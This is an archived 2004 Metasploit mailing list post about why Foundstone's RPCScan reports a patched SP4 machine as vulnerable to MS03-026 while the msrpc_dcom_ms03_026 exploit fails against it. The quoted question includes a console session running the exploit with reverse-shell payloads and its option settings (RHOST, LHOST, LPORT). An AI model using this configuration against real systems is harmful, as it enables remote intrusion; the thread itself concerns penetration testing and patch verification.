Metasploit mailing list archives
RPCScan v2.03 vs exploit msrpc_dcom_ms03_026
From: carric at com2usa.com (Carric Dooley)
Date: Sat, 21 Aug 2004 18:18:19 -0400 (EDT)
I quit using these scanners in favor of MS's KB824146Scan scanner. I remember getting the same false positives, but the MS scanner tells you which RPC patches have been applied. On Thu, 19 Aug 2004, Israel Torres wrote:
Hi, 2 questions: I have run *Foundstone's RPCScan v2.03 on a SP4 system to find that it is resulting in VULNERABLE. When I use and configure msrpc_dcom_ms03_026 (with either win32_reverse, or win32_reverse_vncinject) The following error is returned: msf msrpc_dcom_ms03_026(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Connected to REMACT with group ID 0x6317 [*] Exiting Reverse Handler. I have run this exploit on this machine unpatched and it operated as expected (successfully exploitable with either payload above). Is foundstone's tool just not working correctly? (as it seems) The last question I have been unable to find an answer for is setting the TARGET does not work by simply stating: set TARGET 2K set TARGET Windows 2K since both result in Target: Target Not Specified only set TARGET ALL will configure for Target: Windows NT SP6/2K/XP ALL Thanks for your help, Israel Torres Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ------- ------------------ required RHOST itest The target address required RPORT 135 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ optional EXITFUNC seh Exit technique: "process", "thread", "seh" required LHOST itorres Local address to receive connection required LPORT 4321 Local port to receive connection Target: Windows NT SP6/2K/XP ALL REF:----------------------------- References: *RPCScan v2.03 <http://www.foundstone.com/images/clear.gif> RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins. http://www.foundstone.com/resources/termsofuse.htm?file=rpcscan2.zip
-- Carric Dooley COM2:Interactive Media http://www.com2usa.com
Current thread:
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 Israel Torres (Aug 19)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 H D Moore (Aug 19)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 odinanne (Aug 20)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 Carric Dooley (Aug 21)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 H D Moore (Aug 19)